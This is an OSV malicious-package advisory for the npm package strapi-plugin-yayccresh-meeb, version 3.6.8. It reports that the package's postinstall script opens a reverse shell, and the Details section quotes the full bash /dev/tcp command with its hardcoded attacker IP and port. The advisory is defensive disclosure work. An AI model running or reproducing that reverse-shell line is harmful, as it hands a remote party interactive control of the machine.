MAL-2026-16193

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-yayccresh-meeb/MAL-2026-16193.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16193
Published
2026-09-15T15:54:06Z
Modified
2026-09-15T16:31:10Z
Summary
Malicious code in strapi-plugin-yayccresh-meeb (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (de07e63ac0a0d5b02ad74abd90d075d73e80cdfcc1bbfbdfcfbe56460354735a)

The package's postinstall lifecycle script (node postinstall.js) executes a bash reverse shell that connects to the hardcoded remote endpoint 14.225.210.85:443 and redirects an interactive bash session's stdio through the socket (bash -i > /dev/tcp/14.225.210.85/443 0>&1). Running npm install on this package hands interactive shell access on the installer's machine to whoever controls that endpoint. The package advertises itself as a Strapi plugin but ships no plugin functionality — the postinstall reverse shell is the entire payload.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020055",
            "import_time": "2026-09-15T16:19:14.86859428Z",
            "modified_time": "2026-09-15T15:54:06Z",
            "sha256": "de07e63ac0a0d5b02ad74abd90d075d73e80cdfcc1bbfbdfcfbe56460354735a",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-yayccresh-meeb

Package

Name
strapi-plugin-yayccresh-meeb
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-yayccresh-meeb

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "64197e7dd0a66dc744bda2d461cee1021bbe7d7e62a6ba4739f5c700a2223313",
            "tlsh": "ade0ab18babb5b39d37b48cea111dc2ba74344143279e5a3a4d90322a7c3ead10045de"
        },
        {
            "path": "package.json",
            "sha256": "bf30ea30155de1afbcf129b870588f53877b092b0e07e800b908201c5a38b554",
            "tlsh": "7301495aca2455536dec3a94a81a1182a7264e478d81fc1c23b3011c8f0e2e7747f5dd"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-yayccresh-meeb-3.6.8.tgz",
            "hashes": {
                "sha1": "7f32c0f298f0293ddfc02ba6ad0085f564bc51da",
                "sha512_sri": "sha512-9W73tWjWZQguvkB+V6bWDPvj03ldXKW63b74qlfCBVFFZIqUYAmVJHizHxHK/2360Ou8gtxY9amh8TePiHsZog=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-yayccresh-meeb/MAL-2026-16193.json"